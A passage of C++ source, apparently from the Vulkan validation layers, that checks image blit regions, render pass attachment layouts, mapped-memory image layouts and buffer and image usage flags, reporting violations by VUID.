static_cast<int32_t>(src_extent.width))) { oob = true; skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-srcOffset-00243", "vkCmdBlitImage(): region [%d] srcOffset[].x values (%1d, %1d) exceed srcSubresource width extent (%1d).", i, rgn.srcOffsets[0].x, rgn.srcOffsets[1].x, src_extent.width); } if ((rgn.srcOffsets[0].y < 0) || (rgn.srcOffsets[0].y > static_cast<int32_t>(src_extent.height)) || (rgn.srcOffsets[1].y < 0) || (rgn.srcOffsets[1].y > static_cast<int32_t>(src_extent.height))) { oob = true; skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-srcOffset-00244", "vkCmdBlitImage(): region [%d] srcOffset[].y values (%1d, %1d) exceed srcSubresource height extent (%1d).", i, rgn.srcOffsets[0].y, rgn.srcOffsets[1].y, src_extent.height); } if ((rgn.srcOffsets[0].z < 0) || (rgn.srcOffsets[0].z > static_cast<int32_t>(src_extent.depth)) || (rgn.srcOffsets[1].z < 0) || (rgn.srcOffsets[1].z > static_cast<int32_t>(src_extent.depth))) { oob = true; skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-srcOffset-00246", "vkCmdBlitImage(): region [%d] srcOffset[].z values (%1d, %1d) exceed srcSubresource depth extent (%1d).", i, rgn.srcOffsets[0].z, rgn.srcOffsets[1].z, src_extent.depth); } if (oob) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdBlitImage-pRegions-00215", "vkCmdBlitImage(): region [%d] source image blit region exceeds image dimensions.", i); } // Validate dest image offsets VkExtent3D dst_extent = GetImageSubresourceExtent(dst_image_state, &(rgn.dstSubresource)); if (VK_IMAGE_TYPE_1D == dst_type) { if ((0 != rgn.dstOffsets[0].y) || (1 != rgn.dstOffsets[1].y)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-dstImage-00250", "vkCmdBlitImage(): region [%d], dest image of type VK_IMAGE_TYPE_1D with dstOffset[].y values of " "(%1d, %1d). These must be (0, 1).", i, rgn.dstOffsets[0].y, rgn.dstOffsets[1].y); } } if ((VK_IMAGE_TYPE_1D == dst_type) || (VK_IMAGE_TYPE_2D == dst_type)) { if ((0 != rgn.dstOffsets[0].z) || (1 != rgn.dstOffsets[1].z)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-dstImage-00252", "vkCmdBlitImage(): region [%d], dest image of type VK_IMAGE_TYPE_1D or VK_IMAGE_TYPE_2D with " "dstOffset[].z values of (%1d, %1d). These must be (0, 1).", i, rgn.dstOffsets[0].z, rgn.dstOffsets[1].z); } } oob = false; if ((rgn.dstOffsets[0].x < 0) || (rgn.dstOffsets[0].x > static_cast<int32_t>(dst_extent.width)) || (rgn.dstOffsets[1].x < 0) || (rgn.dstOffsets[1].x > static_cast<int32_t>(dst_extent.width))) { oob = true; skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-dstOffset-00248", "vkCmdBlitImage(): region [%d] dstOffset[].x values (%1d, %1d) exceed dstSubresource width extent (%1d).", i, rgn.dstOffsets[0].x, rgn.dstOffsets[1].x, dst_extent.width); } if ((rgn.dstOffsets[0].y < 0) || (rgn.dstOffsets[0].y > static_cast<int32_t>(dst_extent.height)) || (rgn.dstOffsets[1].y < 0) || (rgn.dstOffsets[1].y > static_cast<int32_t>(dst_extent.height))) { oob = true; skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-dstOffset-00249", "vkCmdBlitImage(): region [%d] dstOffset[].y values (%1d, %1d) exceed dstSubresource height extent (%1d).", i, rgn.dstOffsets[0].y, rgn.dstOffsets[1].y, dst_extent.height); } if ((rgn.dstOffsets[0].z < 0) || (rgn.dstOffsets[0].z > static_cast<int32_t>(dst_extent.depth)) || (rgn.dstOffsets[1].z < 0) || (rgn.dstOffsets[1].z > static_cast<int32_t>(dst_extent.depth))) { oob = true; skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-dstOffset-00251", "vkCmdBlitImage(): region [%d] dstOffset[].z values (%1d, %1d) exceed dstSubresource depth extent (%1d).", i, rgn.dstOffsets[0].z, rgn.dstOffsets[1].z, dst_extent.depth); } if (oob) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-vkCmdBlitImage-pRegions-00216", "vkCmdBlitImage(): region [%d] destination image blit region exceeds image dimensions.", i); } if ((VK_IMAGE_TYPE_3D == src_type) || (VK_IMAGE_TYPE_3D == dst_type)) { if ((0 != rgn.srcSubresource.baseArrayLayer) || (1 != rgn.srcSubresource.layerCount) || (0 != rgn.dstSubresource.baseArrayLayer) || (1 != rgn.dstSubresource.layerCount)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageBlit-srcImage-00240", "vkCmdBlitImage(): region [%d] blit to/from a 3D image type with a non-zero baseArrayLayer, or a " "layerCount other than 1.", i); } } } // per-region checks } else { assert(0); } return skip; } void CoreChecks::PreCallRecordCmdBlitImage(VkCommandBuffer commandBuffer, VkImage srcImage, VkImageLayout srcImageLayout, VkImage dstImage, VkImageLayout dstImageLayout, uint32_t regionCount, const VkImageBlit *pRegions, VkFilter filter) { auto cb_node = GetCBNode(commandBuffer); auto src_image_state = GetImageState(srcImage); auto dst_image_state = GetImageState(dstImage); // Make sure that all image slices are updated to correct layout for (uint32_t i = 0; i < regionCount; ++i) { SetImageLayout(cb_node, src_image_state, pRegions[i].srcSubresource, srcImageLayout); SetImageLayout(cb_node, dst_image_state, pRegions[i].dstSubresource, dstImageLayout); } // Update bindings between images and cmd buffer AddCommandBufferBindingImage(cb_node, src_image_state); AddCommandBufferBindingImage(cb_node, dst_image_state); } // This validates that the initial layout specified in the command buffer for the IMAGE is the same as the global IMAGE layout bool CoreChecks::ValidateCmdBufImageLayouts(GLOBAL_CB_NODE *pCB, std::unordered_map<ImageSubresourcePair, IMAGE_LAYOUT_NODE> const &globalImageLayoutMap, std::unordered_map<ImageSubresourcePair, IMAGE_LAYOUT_NODE> &overlayLayoutMap) { bool skip = false; for (auto cb_image_data : pCB->imageLayoutMap) { VkImageLayout imageLayout; if (FindLayout(overlayLayoutMap, cb_image_data.first, imageLayout) || FindLayout(globalImageLayoutMap, cb_image_data.first, imageLayout)) { if (cb_image_data.second.initialLayout == VK_IMAGE_LAYOUT_UNDEFINED) { // TODO: Set memory invalid which is in mem_tracker currently } else if (imageLayout != cb_image_data.second.initialLayout) { if (cb_image_data.first.hasSubresource) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(pCB->commandBuffer), kVUID_Core_DrawState_InvalidImageLayout, "Submitted command buffer expects image %s (subresource: aspectMask 0x%X array layer %u, mip level " "%u) to be in layout %s--instead, image %s's current layout is %s.", report_data->FormatHandle(cb_image_data.first.image).c_str(), cb_image_data.first.subresource.aspectMask, cb_image_data.first.subresource.arrayLayer, cb_image_data.first.subresource.mipLevel, string_VkImageLayout(cb_image_data.second.initialLayout), report_data->FormatHandle(cb_image_data.first.image).c_str(), string_VkImageLayout(imageLayout)); } else { skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(pCB->commandBuffer), kVUID_Core_DrawState_InvalidImageLayout, "Submitted command buffer expects image %s to be in layout %s--instead, image %s's current layout is %s.", report_data->FormatHandle(cb_image_data.first.image).c_str(), string_VkImageLayout(cb_image_data.second.initialLayout), report_data->FormatHandle(cb_image_data.first.image).c_str(), string_VkImageLayout(imageLayout)); } } SetLayout(overlayLayoutMap, cb_image_data.first, cb_image_data.second.layout); } } return skip; } void CoreChecks::UpdateCmdBufImageLayouts(GLOBAL_CB_NODE *pCB) { for (auto cb_image_data : pCB->imageLayoutMap) { VkImageLayout imageLayout; FindGlobalLayout(cb_image_data.first, imageLayout); SetGlobalLayout(cb_image_data.first, cb_image_data.second.layout); } } // ValidateLayoutVsAttachmentDescription is a general function where we can validate various state associated with the // VkAttachmentDescription structs that are used by the sub-passes of a renderpass. Initial check is to make sure that READ_ONLY // layout attachments don't have CLEAR as their loadOp. bool CoreChecks::ValidateLayoutVsAttachmentDescription(const debug_report_data *report_data, RenderPassCreateVersion rp_version, const VkImageLayout first_layout, const uint32_t attachment, const VkAttachmentDescription2KHR &attachment_description) { bool skip = false; const char *vuid; const bool use_rp2 = (rp_version == RENDER_PASS_VERSION_2); // Verify that initial loadOp on READ_ONLY attachments is not CLEAR if (attachment_description.loadOp == VK_ATTACHMENT_LOAD_OP_CLEAR) { if (use_rp2 && ((first_layout == VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL) || (first_layout == VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL) || (first_layout == VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL))) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkRenderPassCreateInfo2KHR-pAttachments-02522", "Cannot clear attachment %d with invalid first layout %s.", attachment, string_VkImageLayout(first_layout)); } else if (!use_rp2 && ((first_layout == VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL) || (first_layout == VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL))) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, "VUID-VkRenderPassCreateInfo-pAttachments-00836", "Cannot clear attachment %d with invalid first layout %s.", attachment, string_VkImageLayout(first_layout)); } } if (attachment_description.loadOp == VK_ATTACHMENT_LOAD_OP_CLEAR) { if (first_layout == VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL) { vuid = use_rp2 ? kVUID_Core_DrawState_InvalidRenderpass : "VUID-VkRenderPassCreateInfo-pAttachments-01566"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, vuid, "Cannot clear attachment %d with invalid first layout %s.", attachment, string_VkImageLayout(first_layout)); } } if (attachment_description.stencilLoadOp == VK_ATTACHMENT_LOAD_OP_CLEAR) { if (first_layout == VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL) { vuid = use_rp2 ? kVUID_Core_DrawState_InvalidRenderpass : "VUID-VkRenderPassCreateInfo-pAttachments-01567"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, vuid, "Cannot clear attachment %d with invalid first layout %s.", attachment, string_VkImageLayout(first_layout)); } } return skip; } bool CoreChecks::ValidateLayouts(RenderPassCreateVersion rp_version, VkDevice device, const VkRenderPassCreateInfo2KHR *pCreateInfo) { bool skip = false; const char *vuid; const bool use_rp2 = (rp_version == RENDER_PASS_VERSION_2); const char *const function_name = use_rp2 ? "vkCreateRenderPass2KHR()" : "vkCreateRenderPass()"; for (uint32_t i = 0; i < pCreateInfo->attachmentCount; ++i) { VkFormat format = pCreateInfo->pAttachments[i].format; if (pCreateInfo->pAttachments[i].initialLayout == VK_IMAGE_LAYOUT_UNDEFINED) { if ((FormatIsColor(format) || FormatHasDepth(format)) && pCreateInfo->pAttachments[i].loadOp == VK_ATTACHMENT_LOAD_OP_LOAD) { skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidRenderpass, "Render pass has an attachment with loadOp == VK_ATTACHMENT_LOAD_OP_LOAD and initialLayout == " "VK_IMAGE_LAYOUT_UNDEFINED. This is probably not what you intended. Consider using " "VK_ATTACHMENT_LOAD_OP_DONT_CARE instead if the image truely is undefined at the start of the " "render pass."); } if (FormatHasStencil(format) && pCreateInfo->pAttachments[i].stencilLoadOp == VK_ATTACHMENT_LOAD_OP_LOAD) { skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidRenderpass, "Render pass has an attachment with stencilLoadOp == VK_ATTACHMENT_LOAD_OP_LOAD and initialLayout " "== VK_IMAGE_LAYOUT_UNDEFINED. This is probably not what you intended. Consider using " "VK_ATTACHMENT_LOAD_OP_DONT_CARE instead if the image truely is undefined at the start of the " "render pass."); } } } // Track when we're observing the first use of an attachment std::vector<bool> attach_first_use(pCreateInfo->attachmentCount, true); for (uint32_t i = 0; i < pCreateInfo->subpassCount; ++i) { const VkSubpassDescription2KHR &subpass = pCreateInfo->pSubpasses[i]; // Check input attachments first, so we can detect first-use-as-input for VU #00349 for (uint32_t j = 0; j < subpass.inputAttachmentCount; ++j) { auto attach_index = subpass.pInputAttachments[j].attachment; if (attach_index == VK_ATTACHMENT_UNUSED) continue; switch (subpass.pInputAttachments[j].layout) { case VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL: case VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL: // These are ideal. break; case VK_IMAGE_LAYOUT_GENERAL: // May not be optimal. TODO: reconsider this warning based on other constraints. skip |= log_msg(report_data, VK_DEBUG_REPORT_PERFORMANCE_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidImageLayout, "Layout for input attachment is GENERAL but should be READ_ONLY_OPTIMAL."); break; case VK_IMAGE_LAYOUT_UNDEFINED: case VK_IMAGE_LAYOUT_PREINITIALIZED: vuid = use_rp2 ? "VUID-VkAttachmentReference2KHR-layout-03077" : "VUID-VkAttachmentReference-layout-00857"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, vuid, "Layout for input attachment reference %u in subpass %u is %s but must be " "DEPTH_STENCIL_READ_ONLY, SHADER_READ_ONLY_OPTIMAL, or GENERAL.", j, i, string_VkImageLayout(subpass.pDepthStencilAttachment->layout)); break; case VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL_KHR: case VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL_KHR: if (GetDeviceExtensions()->vk_khr_maintenance2) { break; } else { // Intentionally fall through to generic error message } // fall through default: // No other layouts are acceptable skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidImageLayout, "Layout for input attachment is %s but can only be READ_ONLY_OPTIMAL or GENERAL.", string_VkImageLayout(subpass.pInputAttachments[j].layout)); } if (attach_first_use[attach_index]) { skip |= ValidateLayoutVsAttachmentDescription(report_data, rp_version, subpass.pInputAttachments[j].layout, attach_index, pCreateInfo->pAttachments[attach_index]); bool used_as_depth = (subpass.pDepthStencilAttachment != NULL && subpass.pDepthStencilAttachment->attachment == attach_index); bool used_as_color = false; for (uint32_t k = 0; !used_as_depth && !used_as_color && k < subpass.colorAttachmentCount; ++k) { used_as_color = (subpass.pColorAttachments[k].attachment == attach_index); } if (!used_as_depth && !used_as_color && pCreateInfo->pAttachments[attach_index].loadOp == VK_ATTACHMENT_LOAD_OP_CLEAR) { vuid = use_rp2 ? "VUID-VkSubpassDescription2KHR-loadOp-03064" : "VUID-VkSubpassDescription-loadOp-00846"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, vuid, "%s: attachment %u is first used as an input attachment in subpass %u with loadOp=CLEAR.", function_name, attach_index, attach_index); } } attach_first_use[attach_index] = false; } for (uint32_t j = 0; j < subpass.colorAttachmentCount; ++j) { auto attach_index = subpass.pColorAttachments[j].attachment; if (attach_index == VK_ATTACHMENT_UNUSED) continue; // TODO: Need a way to validate shared presentable images here, currently just allowing // VK_IMAGE_LAYOUT_SHARED_PRESENT_KHR // as an acceptable layout, but need to make sure shared presentable images ONLY use that layout switch (subpass.pColorAttachments[j].layout) { case VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL: // This is ideal. case VK_IMAGE_LAYOUT_SHARED_PRESENT_KHR: // TODO: See note above, just assuming that attachment is shared presentable and allowing this for now. break; case VK_IMAGE_LAYOUT_GENERAL: // May not be optimal; TODO: reconsider this warning based on other constraints? skip |= log_msg(report_data, VK_DEBUG_REPORT_PERFORMANCE_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidImageLayout, "Layout for color attachment is GENERAL but should be COLOR_ATTACHMENT_OPTIMAL."); break; case VK_IMAGE_LAYOUT_UNDEFINED: case VK_IMAGE_LAYOUT_PREINITIALIZED: vuid = use_rp2 ? "VUID-VkAttachmentReference2KHR-layout-03077" : "VUID-VkAttachmentReference-layout-00857"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, vuid, "Layout for color attachment reference %u in subpass %u is %s but should be " "COLOR_ATTACHMENT_OPTIMAL or GENERAL.", j, i, string_VkImageLayout(subpass.pColorAttachments[j].layout)); break; default: skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidImageLayout, "Layout for color attachment is %s but can only be COLOR_ATTACHMENT_OPTIMAL or GENERAL.", string_VkImageLayout(subpass.pColorAttachments[j].layout)); } if (subpass.pResolveAttachments && (subpass.pResolveAttachments[j].attachment != VK_ATTACHMENT_UNUSED) && (subpass.pResolveAttachments[j].layout == VK_IMAGE_LAYOUT_UNDEFINED || subpass.pResolveAttachments[j].layout == VK_IMAGE_LAYOUT_PREINITIALIZED)) { vuid = use_rp2 ? "VUID-VkAttachmentReference2KHR-layout-03077" : "VUID-VkAttachmentReference-layout-00857"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, vuid, "Layout for resolve attachment reference %u in subpass %u is %s but should be " "COLOR_ATTACHMENT_OPTIMAL or GENERAL.", j, i, string_VkImageLayout(subpass.pResolveAttachments[j].layout)); } if (attach_first_use[attach_index]) { skip |= ValidateLayoutVsAttachmentDescription(report_data, rp_version, subpass.pColorAttachments[j].layout, attach_index, pCreateInfo->pAttachments[attach_index]); } attach_first_use[attach_index] = false; } if (subpass.pDepthStencilAttachment && subpass.pDepthStencilAttachment->attachment != VK_ATTACHMENT_UNUSED) { switch (subpass.pDepthStencilAttachment->layout) { case VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL: case VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL: // These are ideal. break; case VK_IMAGE_LAYOUT_GENERAL: // May not be optimal; TODO: reconsider this warning based on other constraints? GENERAL can be better than // doing a bunch of transitions. skip |= log_msg(report_data, VK_DEBUG_REPORT_PERFORMANCE_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidImageLayout, "GENERAL layout for depth attachment may not give optimal performance."); break; case VK_IMAGE_LAYOUT_UNDEFINED: case VK_IMAGE_LAYOUT_PREINITIALIZED: vuid = use_rp2 ? "VUID-VkAttachmentReference2KHR-layout-03077" : "VUID-VkAttachmentReference-layout-00857"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, vuid, "Layout for depth attachment reference in subpass %u is %s but must be a valid depth/stencil " "layout or GENERAL.", i, string_VkImageLayout(subpass.pDepthStencilAttachment->layout)); break; case VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL_KHR: case VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL_KHR: if (GetDeviceExtensions()->vk_khr_maintenance2) { break; } else { // Intentionally fall through to generic error message } // fall through default: // No other layouts are acceptable skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidImageLayout, "Layout for depth attachment is %s but can only be DEPTH_STENCIL_ATTACHMENT_OPTIMAL, " "DEPTH_STENCIL_READ_ONLY_OPTIMAL or GENERAL.", string_VkImageLayout(subpass.pDepthStencilAttachment->layout)); } auto attach_index = subpass.pDepthStencilAttachment->attachment; if (attach_first_use[attach_index]) { skip |= ValidateLayoutVsAttachmentDescription(report_data, rp_version, subpass.pDepthStencilAttachment->layout, attach_index, pCreateInfo->pAttachments[attach_index]); } attach_first_use[attach_index] = false; } } return skip; } // For any image objects that overlap mapped memory, verify that their layouts are PREINIT or GENERAL bool CoreChecks::ValidateMapImageLayouts(VkDevice device, DEVICE_MEM_INFO const *mem_info, VkDeviceSize offset, VkDeviceSize end_offset) { bool skip = false; // Iterate over all bound image ranges and verify that for any that overlap the map ranges, the layouts are // VK_IMAGE_LAYOUT_PREINITIALIZED or VK_IMAGE_LAYOUT_GENERAL // TODO : This can be optimized if we store ranges based on starting address and early exit when we pass our range for (auto image_handle : mem_info->bound_images) { auto img_it = mem_info->bound_ranges.find(image_handle); if (img_it != mem_info->bound_ranges.end()) { if (RangesIntersect(&img_it->second, offset, end_offset)) { std::vector<VkImageLayout> layouts; if (FindLayouts(VkImage(image_handle), layouts)) { for (auto layout : layouts) { if (layout != VK_IMAGE_LAYOUT_PREINITIALIZED && layout != VK_IMAGE_LAYOUT_GENERAL) { skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_DEVICE_MEMORY_EXT, HandleToUint64(mem_info->mem), kVUID_Core_DrawState_InvalidImageLayout, "Mapping an image with layout %s can result in undefined behavior if this memory is used " "by the device. Only GENERAL or PREINITIALIZED should be used.", string_VkImageLayout(layout)); } } } } } } return skip; } // Helper function to validate correct usage bits set for buffers or images. Verify that (actual & desired) flags != 0 or, if strict // is true, verify that (actual & desired) flags == desired bool CoreChecks::ValidateUsageFlags(VkFlags actual, VkFlags desired, VkBool32 strict, uint64_t obj_handle, VulkanObjectType obj_type, const char *msgCode, char const *func_name, char const *usage_str) { bool correct_usage = false; bool skip = false; const char *type_str = object_string[obj_type]; if (strict) { correct_usage = ((actual & desired) == desired); } else { correct_usage = ((actual & desired) != 0); } if (!correct_usage) { if (msgCode == kVUIDUndefined) { // TODO: Fix callers with kVUIDUndefined to use correct validation checks. skip = log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, get_debug_report_enum[obj_type], obj_handle, kVUID_Core_MemTrack_InvalidUsageFlag, "Invalid usage flag for %s %s used by %s. In this case, %s should have %s set during creation.", type_str, report_data->FormatHandle(obj_handle).c_str(), func_name, type_str, usage_str); } else { skip = log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, get_debug_report_enum[obj_type], obj_handle, msgCode, "Invalid usage flag for %s %s used by %s. In this case, %s should have %s set during creation.", type_str, report_data->FormatHandle(obj_handle).c_str(), func_name, type_str, usage_str); } } return skip; } // Helper function to validate usage flags for buffers. For given buffer_state send actual vs. desired usage off to helper above // where an error will be flagged if usage is not correct bool CoreChecks::ValidateImageUsageFlags(IMAGE_STATE const *image_state, VkFlags desired, bool strict, const char *msgCode, char const *func_name, char const *usage_string) { return ValidateUsageFlags(image_state->createInfo.usage, desired, strict, HandleToUint64(image_state->image), kVulkanObjectTypeImage, msgCode, func_name, usage_string); } bool CoreChecks::ValidateImageFormatFeatureFlags(IMAGE_STATE const *image_state, VkFormatFeatureFlags desired, char const *func_name, const char *linear_vuid, const char *optimal_vuid) { VkFormatProperties format_properties = GetPDFormatProperties(image_state->createInfo.format); bool skip = false; if (image_state->createInfo.tiling == VK_IMAGE_TILING_LINEAR) { if ((format_properties.linearTilingFeatures & desired) != desired) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), linear_vuid, "In %s, invalid linearTilingFeatures (0x%08X) for format %u used by image %s.", func_name, format_properties.linearTilingFeatures, image_state->createInfo.format, report_data->FormatHandle(image_state->image).c_str()); } } else if (image_state->createInfo.tiling == VK_IMAGE_TILING_OPTIMAL) { if ((format_properties.optimalTilingFeatures & desired) != desired) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image_state->image), optimal_vuid, "In %s, invalid optimalTilingFeatures (0x%08X) for format %u used by image %s.", func_name, format_properties.optimalTilingFeatures, image_state->createInfo.format, report_data->FormatHandle(image_state->image).c_str()); } } return skip; } bool CoreChecks::ValidateImageSubresourceLayers(const GLOBAL_CB_NODE *cb_node, const VkImageSubresourceLayers *subresource_layers, char const *func_name, char const *member, uint32_t i) { bool skip = false; // layerCount must not be zero if (subresource_layers->layerCount == 0) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageSubresourceLayers-layerCount-01700", "In %s, pRegions[%u].%s.layerCount must not be zero.", func_name, i, member); } // aspectMask must not contain VK_IMAGE_ASPECT_METADATA_BIT if (subresource_layers->aspectMask & VK_IMAGE_ASPECT_METADATA_BIT) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageSubresourceLayers-aspectMask-00168", "In %s, pRegions[%u].%s.aspectMask has VK_IMAGE_ASPECT_METADATA_BIT set.", func_name, i, member); } // if aspectMask contains COLOR, it must not contain either DEPTH or STENCIL if ((subresource_layers->aspectMask & VK_IMAGE_ASPECT_COLOR_BIT) && (subresource_layers->aspectMask & (VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT))) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_node->commandBuffer), "VUID-VkImageSubresourceLayers-aspectMask-00167", "In %s, pRegions[%u].%s.aspectMask has VK_IMAGE_ASPECT_COLOR_BIT and either VK_IMAGE_ASPECT_DEPTH_BIT or " "VK_IMAGE_ASPECT_STENCIL_BIT set.", func_name, i, member); } return skip; } // Helper function to validate usage flags for buffers. For given buffer_state send actual vs. desired usage off to helper above // where an error will be flagged if usage is not correct bool CoreChecks::ValidateBufferUsageFlags(BUFFER_STATE const *buffer_state, VkFlags desired, bool strict, const char *msgCode, char const *func_name, char const *usage_string) { return ValidateUsageFlags(buffer_state->createInfo.usage, desired, strict, HandleToUint64(buffer_state->buffer), kVulkanObjectTypeBuffer, msgCode, func_name, usage_string); } bool CoreChecks::ValidateBufferViewRange(const BUFFER_STATE *buffer_state, const VkBufferViewCreateInfo *pCreateInfo, const VkPhysicalDeviceLimits *device_limits) { bool skip = false; const VkDeviceSize &range = pCreateInfo->range; if (range != 